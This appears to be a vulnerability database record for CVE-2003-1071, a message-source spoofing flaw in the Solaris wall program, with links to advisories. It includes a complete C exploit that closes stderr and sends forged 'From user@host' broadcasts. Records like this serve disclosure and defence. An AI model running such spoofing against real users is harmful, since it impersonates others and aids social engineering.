Sun Solaris Wall Message Source Spoofing Vulnerability

Vulnerability ID: 1107145
Vulnerability type: Design error
Published: 2003-01-03
Updated: 2005-10-20
CVE ID: CVE-2003-1071
CNNVD-ID: CNNVD-200301-008
Platform: Solaris
CVSS score: 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/22120
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200301-008
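|Vulnerability details
Solaris is a UNIX operating system developed and maintained by Sun Microsystems. The wall program in Solaris does not handle the message source correctly, and a local attacker can exploit this flaw to send messages with a forged source to other users. wall is a setgid tty program used to broadcast a message to all users who are currently logged in. It can also receive messages from remote hosts over RPC (rpc.walld). wall tells local and remote messages apart by checking whether the stderr file descriptor points to a corresponding tty. If it does not, wall checks whether the first 5 bytes of the message are "From"; if they are, the next non-whitespace characters must be in user@host form. An attacker can simply close stderr before executing /usr/sbin/wall and send a forged "From" header; users who receive the message will believe it came from another user. Combined with social engineering, this may lead to disclosure of sensitive information.
|Exploit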
source: http://www.securityfocus.com/bid/6509/info

Solaris is the freely available UNIX Operating System variant distributed by Sun Microsystems.

The wall client packaged with Solaris makes assumptions about a user's environment when the client is executed. It assumes that if the file descriptor of stderr points to a tty when wall is executed, the user is local. If not, the user is considered remote, and the first five bytes of the supplied 'From' text will be used by wall as the user's identification. This makes it possible for a user to close stderr prior to the execution of wall, and send a spoofed message using the client.

/*
 wallspoof.c - SOLARIS (X86/SPARC) Exploit
 Don't use this in a malicious way! (i.e. to own people)
 */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
  char *userhost;
  char mesg[2050];
  FILE *tmp;
  if (argc < 2) {
    fprintf (stderr, "usage: wallspoof user@host\n");
    exit (-1);
  }
  userhost = argv[1];
  if ((tmp = fopen("/tmp/rxax", "w")) == NULL) {
    perror ("open");
    exit (-1);
  }
  printf ("Enter your message below.  End your message with an EOF (Control+D).\n");
  /* The message body starts with the "From user@host:" header. */
  fprintf (tmp, "From %s:", userhost);
  while (fgets(mesg, sizeof(mesg), stdin) != NULL)
    fprintf (tmp, "%s", mesg);
  fclose (tmp);
  /* With stderr closed, wall no longer sees a tty on that descriptor. */
  fclose (stderr);
  printf ("<Done>\n");
  system ("/usr/sbin/wall < /tmp/rxax");
  unlink ("/tmp/rxax");
  return 0;
}
|References

Source: US-CERT Vulnerability Note: VU#944241
Name: VU#944241
Link: http://www.kb.cert.org/vuls/id/944241
Source: XF
Name: solaris-wall-message-spoofing(11608)
Link: http://xforce.iss.net/xforce/xfdb/11608
Source: SUNALERT
Name: 51980
Link: http://sunsolve.sun.com/search/document.do?assetkey=1-26-51980-1
Source: BUGTRAQ
Name: 20030103 Solaris 2.x /usr/sbin/wall Advisory
Link: http://www.securityfocus.com/archive/1/305105
Source: SECUNIA
Name: 7825
Link: http://secunia.com/advisories/7825/
Source: SECTRACK
Name: 1006682
Link: http://www.securitytracker.com/id?1006682
Source: SECTRACK
Name: 1005882
Link: http://www.securitytracker.com/id?1005882
Source: BID
Name: 6509
Link: http://www.securityfocus.com/bid/6509
